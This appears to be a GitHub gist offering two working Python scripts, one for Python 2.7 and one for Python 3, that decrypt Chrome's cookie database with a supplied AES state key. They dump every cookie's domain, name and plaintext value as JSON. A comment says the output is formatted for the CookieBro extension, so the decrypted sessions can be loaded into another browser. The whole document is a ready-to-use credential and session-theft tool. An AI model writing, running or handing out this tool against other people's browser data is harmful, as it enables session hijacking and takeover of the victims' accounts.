@jackson5sec
Created November 7, 2023 17:02
Chrome Cookie Decryptor with AES State Key
import sqlite3
import sys
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import binascii
import json
# Python2.7 script
def decrypt_payload(cipher, payload):
    """Pass ``payload`` through ``cipher.decrypt`` and return the result.

    Only decryption happens here. This helper does not check an
    authentication tag, so any integrity check is left to the caller.
    """
    plaintext = cipher.decrypt(payload)
    return plaintext
def generate_cipher(aes_key, iv):
    """Build an AES cipher object in GCM mode from ``aes_key`` and the nonce ``iv``."""
    # In GCM mode the single positional argument after the mode is the nonce,
    # so it is passed by name here.
    gcm_cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
    return gcm_cipher
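def decrypt_password(ciphertext, secret_key):
    """Decrypt one ``encrypted_value`` blob and return it as text.

    The blob is split by fixed offsets: bytes 0-2 are skipped (presumably a
    version prefix -- confirm against the browser build that wrote the file),
    bytes 3-14 are the 12-byte GCM nonce, the last 16 bytes are the GCM
    authentication tag, and the bytes in between are the ciphertext.

    The tag is verified after decryption. Without that check, a wrong key or
    a modified blob produces arbitrary bytes that can still decode as UTF-8
    and be reported as a genuine value.

    Returns the decrypted text. Returns "" after printing an error when the
    blob is too short, the tag does not match, or the plaintext is not
    valid UTF-8.
    """
    try:
        # 3-byte header + 12-byte nonce + 16-byte tag is the smallest blob
        # that the slicing below can split correctly.
        if len(ciphertext) < 3 + 12 + 16:
            raise ValueError("encrypted value is too short")
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        auth_tag = ciphertext[-16:]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        # Raises ValueError when the tag does not match the key and ciphertext.
        cipher.verify(auth_tag)
        return decrypted_pass.decode('utf-8')
    except Exception as e:
        print("Error: " + str(e))
        print("[ERR] Unable to decrypt. Please check.")
        return ""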
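# Command-line entry point: read every row of the `cookies` table, decrypt
# its `encrypted_value` with the supplied key, and print the result as JSON.
if len(sys.argv) != 3:
    print("Usage: python script.py <cookies_file_path> <static_aes_key_hex>")
    sys.exit(1)

cookies_file_path = sys.argv[1]
# NOTE: a key passed as an argument is visible in the local process list and
# is usually kept in shell history.
static_aes_key_hex = sys.argv[2]

try:
    static_aes_key = binascii.unhexlify(static_aes_key_hex)
except (TypeError, ValueError, binascii.Error):
    # Python 2.7 raises TypeError for malformed hex, so catching only
    # binascii.Error would let the traceback through.
    print("Error: Invalid hexadecimal key.")
    sys.exit(1)

# Reject impossible key sizes once instead of failing on every row.
if len(static_aes_key) not in (16, 24, 32):
    print("Error: AES key must be 16, 24 or 32 bytes.")
    sys.exit(1)

# sqlite3.connect() creates an empty database when the path does not exist,
# so confirm the file is a readable SQLite database before connecting.
try:
    with open(cookies_file_path, "rb") as db_file:
        db_header = db_file.read(16)
except (IOError, OSError) as e:
    print("Error: cannot read cookies file: " + str(e))
    sys.exit(1)
if db_header != b"SQLite format 3\x00":
    print("Error: not an SQLite database: " + cookies_file_path)
    sys.exit(1)

cookies = []
conn = sqlite3.connect(cookies_file_path)
try:
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, expires_utc, name, path, encrypted_value FROM cookies')
    for row in cursor.fetchall():
        try:
            host_key, expires_utc, name, path, encrypted_value = row
            # decrypt_password() returns "" on failure, so a failed row is
            # still emitted with an empty value.
            decrypted_value = decrypt_password(encrypted_value, static_aes_key)
            cookies.append({
                "domain": host_key,
                "expirationDate": expires_utc,
                "name": name,
                "path": path,
                "value": decrypted_value
            })
        except Exception as e:
            print("Error decrypting cookie: " + str(e))
except sqlite3.Error as e:
    print("Error reading cookies database: " + str(e))
    sys.exit(1)
finally:
    # Close the handle on every exit path, including the sys.exit() above.
    conn.close()

# stdout carries the decrypted values. The error lines above also go to
# stdout, so the stream is pure JSON only when no row failed.
print(json.dumps(cookies, indent=4))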
import sqlite3
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import binascii
import json
# Python3 script
def decrypt_payload(cipher, payload):
    """Pass ``payload`` through ``cipher.decrypt`` and return the result.

    Only decryption happens here. This helper does not check an
    authentication tag, so any integrity check is left to the caller.
    """
    plaintext = cipher.decrypt(payload)
    return plaintext
def generate_cipher(aes_key, iv):
    """Build an AES cipher object in GCM mode from ``aes_key`` and the nonce ``iv``."""
    # In GCM mode the single positional argument after the mode is the nonce,
    # so it is passed by name here.
    gcm_cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
    return gcm_cipher
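def decrypt_password(ciphertext, secret_key):
    """Decrypt one ``encrypted_value`` blob and return it as text.

    The blob is split by fixed offsets: bytes 0-2 are skipped (presumably a
    version prefix -- confirm against the browser build that wrote the file),
    bytes 3-14 are the 12-byte GCM nonce, the last 16 bytes are the GCM
    authentication tag, and the bytes in between are the ciphertext.

    The tag is verified after decryption. Without that check, a wrong key or
    a modified blob produces arbitrary bytes that can still decode as UTF-8
    and be reported as a genuine value.

    Returns the decrypted text. Returns "" after printing an error when the
    blob is too short, the tag does not match, or the plaintext is not
    valid UTF-8.
    """
    try:
        # 3-byte header + 12-byte nonce + 16-byte tag is the smallest blob
        # that the slicing below can split correctly.
        if len(ciphertext) < 3 + 12 + 16:
            raise ValueError("encrypted value is too short")
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        auth_tag = ciphertext[-16:]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        # Raises ValueError when the tag does not match the key and ciphertext.
        cipher.verify(auth_tag)
        return decrypted_pass.decode('utf-8')
    except Exception as e:
        print(f"Error: {str(e)}")
        print("[ERR] Unable to decrypt. Please check.")
        return ""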
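# Command-line entry point: read every row of the `cookies` table, decrypt
# its `encrypted_value` with the supplied key, and print the result as JSON.
if len(sys.argv) != 3:
    print("Usage: python script.py <cookies_file_path> <static_aes_key_hex>")
    sys.exit(1)

cookies_file_path = sys.argv[1]
# NOTE: a key passed as an argument is visible in the local process list and
# is usually kept in shell history.
static_aes_key_hex = sys.argv[2]

try:
    static_aes_key = binascii.unhexlify(static_aes_key_hex)
except (binascii.Error, ValueError):
    print("Error: Invalid hexadecimal key.")
    sys.exit(1)

# Reject impossible key sizes once instead of failing on every row.
if len(static_aes_key) not in (16, 24, 32):
    print("Error: AES key must be 16, 24 or 32 bytes.")
    sys.exit(1)

# sqlite3.connect() creates an empty database when the path does not exist,
# so confirm the file is a readable SQLite database before connecting.
try:
    with open(cookies_file_path, "rb") as db_file:
        db_header = db_file.read(16)
except OSError as e:
    print(f"Error: cannot read cookies file: {str(e)}")
    sys.exit(1)
if db_header != b"SQLite format 3\x00":
    print(f"Error: not an SQLite database: {cookies_file_path}")
    sys.exit(1)

cookies = []
conn = sqlite3.connect(cookies_file_path)
try:
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, expires_utc, name, path, encrypted_value FROM cookies')
    for row in cursor.fetchall():
        try:
            host_key, expires_utc, name, path, encrypted_value = row
            # decrypt_password() returns "" on failure, so a failed row is
            # still emitted with an empty value.
            decrypted_value = decrypt_password(encrypted_value, static_aes_key)
            cookies.append({
                "domain": host_key,
                "expirationDate": expires_utc,
                "name": name,
                "path": path,
                "value": decrypted_value
            })
        except Exception as e:
            print(f"Error decrypting cookie: {str(e)}")
except sqlite3.Error as e:
    print(f"Error reading cookies database: {str(e)}")
    sys.exit(1)
finally:
    # Close the handle on every exit path, including the sys.exit() above.
    conn.close()

# Print cookies in JSON format. stdout carries the decrypted values. The
# error lines above also go to stdout, so the stream is pure JSON only when
# no row failed.
print(json.dumps(cookies, indent=4))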
@jackson5sec

pip install pycryptodome
pip3 install pycryptodome

@jackson5sec

Outputs in JSON format for the CookieBro extension.
